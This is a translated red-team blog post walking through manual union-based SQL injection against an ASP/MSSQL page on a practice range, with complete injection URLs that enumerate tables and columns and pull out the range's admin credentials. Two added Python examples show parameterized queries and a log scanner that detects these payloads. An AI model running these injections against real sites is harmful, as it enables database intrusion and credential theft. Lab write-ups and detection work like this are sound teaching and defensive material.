saulGoodman
A public account focused on red team offensive and defensive research
Notes on manual union-query injection against Microsoft SQL Server
Mssql database introduction
SQL Server is a relational database management system introduced by Microsoft. It is easy to use, scales well and is tightly integrated with related software, running on platforms ranging from laptops running Microsoft Windows 98 to large multiprocessor servers running Microsoft Windows Server 2012.
Microsoft SQL Server is a comprehensive database platform that provides enterprise-class data management with integrated business intelligence (BI) tools. The Microsoft SQL Server database engine provides more secure and reliable storage for relational and structured data, so you can build and manage highly available, high-performance data applications for your business.
Mssql database test environment
Full installation of the SQL Server 2008 database: https://jingyan.baidu.com/article/948f592434b407d80ef5f97d.html
Mssql database permissions introduction
sa permission: database operations, file management, command execution, registry reads, etc.; equivalent to system
db permission: file management, database operations, etc.; equivalent to users-administrators
public permission: database operations; equivalent to guest-users
Mssql database calling code
<%
' Connecting the web application as sa gives every query it runs the sysadmin rights described above
set conn = server.createobject("adodb.connection")
conn.open "provider=sqloledb;source=local;uid=sa;pwd=******;database=database-name"
%>
Note: uid is the account, pwd is the password
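The calling code above only opens the connection; the injection walkthrough on this page works because the page parameter id is concatenated straight into the SQL text. The following added example (mine, not the author's or the range's code) models that pattern in Python with SQLite standing in for SQL Server so it runs offline; the news and manage tables, their rows and the placeholder password value are constructed, and the input is the kind of union all select payload used on this page. It shows the concatenated query handing back the manage row, while the same input bound as a parameter matches nothing, and integer validation rejects it outright.

```python
import sqlite3

# Constructed stand-in schema (assumption): new_list.asp?id=N returns one news
# row, and a manage table holds username/password columns. Table layout, row
# contents and the password value are all made up for this example.
SCHEMA = """
CREATE TABLE news (id INTEGER, title TEXT, body TEXT, posted TEXT);
INSERT INTO news VALUES (1, 'First post',  'hello', '2020-05-01');
INSERT INTO news VALUES (2, 'Second post', 'world', '2020-05-02');
CREATE TABLE manage (id INTEGER, username TEXT, password TEXT);
INSERT INTO manage VALUES (1, 'admin_mz', 'placeholder-hash');
"""

# The shape of the final payload in the walkthrough, as the raw id parameter value.
UNION_PAYLOAD = "-2 union all select null,username,password,null from manage"


def connect():
    """Create an in-memory database with the constructed tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_vulnerable(conn, raw_id):
    """The classic-ASP pattern: the request value is pasted into SQL text.

    Anything in raw_id becomes SQL syntax, which is exactly what the
    order by / union all probes on this page rely on.
    """
    sql = "SELECT id, title, body, posted FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def fetch_bound(conn, raw_id):
    """Same query with the value bound as a parameter.

    The value travels separately from the SQL text, so the payload is compared
    as one literal string against the id column and matches nothing.
    """
    sql = "SELECT id, title, body, posted FROM news WHERE id=?"
    return conn.execute(sql, (raw_id,)).fetchall()


def fetch_safe(conn, raw_id):
    """Validate the type first, then bind: the usual fix for a numeric id."""
    if not raw_id.lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    sql = "SELECT id, title, body, posted FROM news WHERE id=?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def rejects(conn, raw_id):
    """True if fetch_safe refuses the value (used to check the validation path)."""
    try:
        fetch_safe(conn, raw_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    print("vulnerable:", fetch_vulnerable(db, UNION_PAYLOAD))  # leaks the manage row
    print("bound:     ", fetch_bound(db, UNION_PAYLOAD))       # []
    print("safe:       rejected =", rejects(db, UNION_PAYLOAD))  # True
```

Binding alone already defeats the union payload; the integer check on top of it turns a silent empty result into a logged rejection, which is what you want to alert on.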
Manual injection of the Mssql database
Determining whether the database is Mssql
Append the SQL test statement; if the page returns normally, the site's database is Mssql, because Mssql has a default sysobjects table.
SQL statements to determine permissions
and 1=(select is_srvrolemember('sysadmin')) // checks whether the current login is a system administrator (a server role)
and 1=(select is_member('db_owner')) // checks for db_owner permission; db_owner is a database role, so is_member() is used here, as is_srvrolemember() returns NULL for roles that are not server roles
and 1=(select is_srvrolemember('public')) // checks whether it is only public permission
Manual SQL injection vulnerability test (SQL Server database)
Range address: https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe
Injection point: http://219.153.49.228:42837/new_list.asp?id=2
Determining whether the database is Mssql
http://219.153.49.228:42837/new_list.asp?id=2 and exists(select * from sysobjects)
The page returns normally, which shows that the site's database is Mssql!
Determining the number of fields
http://219.153.49.228:42837/new_list.asp?id=2 order by 5
order by 5 returns an error, so we step down by one:
http://219.153.49.228:42837/new_list.asp?id=2 order by 4
order by 4 returns normally, which shows that the query has 4 fields!
Finding the display positions
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,null,null,null
Here we use union all; the difference from union select is that union select automatically removes some duplicate fields! On this range union select does not work, so we use union all. The null values mean that it does not matter whether a field is of character or numeric type.
Next we guess the display positions one by one:
http://219.153.49.228:42837/new_list.asp?id=-2 union all select '1',null,null,null
With '1' the page shows no change, so the first position is not displayed; we move on to the next null:
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,'2',null,null
This time the page shows the digit "2", which means position 2 is one we can use!
We continue with the third position:
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,'2','3',null
The page now additionally shows '3', so the third position can also be used!
We check the fourth as well (two display positions are actually enough): the page shows no change when I test the fourth, which means only the '2' and '3' display positions exist!
Other useful information
Now that we have the display positions, we can use them to show the query results we want on the page!
@@version: get version information
db_name(): database name
user, system_user, current_user, user_name: get the current user name
@@SERVERNAME: get information about the server host
Get version information
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,@@version,'3',null
Get the database name
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,db_name(),'3',null
Get the current user name
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,user,'3',null
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,system_user,'3',null
http://219.153.49.228:42837/new_list.asp?id=-2 union all select null,current_user,'3',null
Query the table names
http://219.153.49.228:42837/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),'3',4
This returns the first table name, manage; then we query the second (my target machine was restarted here, so the port changed):
http://219.153.49.228:43946/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),'3',4
Note: name not in ('manage') means query for names that are not 'manage'; this excludes 'manage' so the next table name is returned
This returns the second table name, announcement; to keep going, just keep extending the not in condition in the same way!
Get the column names
http://219.153.49.228:43946/new_list.asp?id=-2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
Note: col_name returns the column name; object_id('manage') looks it up in the manage table; 1 means the first column name
This returns the first column name, id; to get the second column name we only need to change the 1 to 2: col_name(object_id('manage'),2)
http://219.153.49.228:43946/new_list.asp?id=-2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null
This returns the second column name, username; we continue with the third column name:
http://219.153.49.228:43946/new_list.asp?id=-2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null
The third column name is password; now we have the username and password columns!
Retrieve the data
http://219.153.49.228:43946/new_list.asp?id=-2 union all select null,username, password ,null from manage
This injects out the account admin_mz with password 72e1bfc3f01b7583!
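Each step of the walkthrough above leaves a distinctive query string in the web server log, which is what a defender can build detection on. As an added example (mine, not from the original post), here is a small Python scanner that tags IIS W3C-style log lines by the stage of the procedure they match: fingerprinting with sysobjects, order by column counting, union all select, server-information functions and schema enumeration via sysobjects/col_name, then summarises the stages seen per client. The log lines, client addresses and timestamps are constructed; the patterns are derived only from the payloads shown on this page and would need tuning for real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (not real traffic): the query strings are
# the probes from the walkthrough, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2020-05-01 09:00:01 10.0.0.5 GET /new_list.asp id=2 42837 198.51.100.7 200
2020-05-01 09:00:09 10.0.0.5 GET /new_list.asp id=2+and+exists(select+*+from+sysobjects) 42837 198.51.100.7 200
2020-05-01 09:00:15 10.0.0.5 GET /new_list.asp id=2+order+by+5 42837 198.51.100.7 500
2020-05-01 09:00:20 10.0.0.5 GET /new_list.asp id=-2+union+all+select+null,%40%40version,'3',null 42837 198.51.100.7 200
2020-05-01 09:00:31 10.0.0.5 GET /new_list.asp id=-2+union+all+select+null,(select+top+1+col_name(object_id('manage'),1)+from+sysobjects),null,null 42837 198.51.100.7 200
2020-05-01 09:00:40 10.0.0.5 GET /new_list.asp id=3 42837 203.0.113.9 200
"""

# One regex per stage of the procedure on this page, matched against the
# decoded, lower-cased, whitespace-collapsed query string.
PATTERNS = [
    ("mssql-fingerprint", re.compile(r"\bexists\s*\(\s*select\b.*\bsysobjects\b")),
    ("role-probe", re.compile(r"\bis_(srv)?rolemember\s*\(|\bis_member\s*\(")),
    ("column-count", re.compile(r"\border\s+by\s+\d+\b")),
    ("union-based", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("server-info", re.compile(r"@@version|@@servername|\bdb_name\s*\(|\b(system_user|current_user|user_name)\b")),
    ("schema-enum", re.compile(r"\bsysobjects\b|\bcol_name\s*\(|\bobject_id\s*\(")),
]


def normalize(query):
    """Decode percent-escapes and '+', lower-case, and collapse whitespace."""
    decoded = unquote_plus(query).lower()
    return re.sub(r"\s+", " ", decoded)


def scan_log(text):
    """Return one finding per log line whose query string matches a stage."""
    fields = None
    findings = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the lines that follow
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        query = normalize(rec.get("cs-uri-query", "-"))
        tags = [name for name, rx in PATTERNS if rx.search(query)]
        if tags:
            findings.append({
                "time": rec["time"],
                "client": rec["c-ip"],
                "uri": rec["cs-uri-stem"],
                "tags": tags,
                "query": query,
            })
    return findings


def clients_by_stage(findings):
    """Distinct stages seen per client.

    Several different stages from one address in a short window is the
    signature of a manual walkthrough rather than a single noisy request.
    """
    seen = {}
    for f in findings:
        seen.setdefault(f["client"], set()).update(f["tags"])
    return {client: sorted(tags) for client, tags in seen.items()}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["client"], ",".join(h["tags"]), "->", h["query"])
    print(clients_by_stage(hits))
```

The client-level summary is the useful alert: a single order by probe is common scanner noise, but one address progressing through fingerprint, column count, union and schema enumeration against the same .asp page is the sequence this post performs by hand.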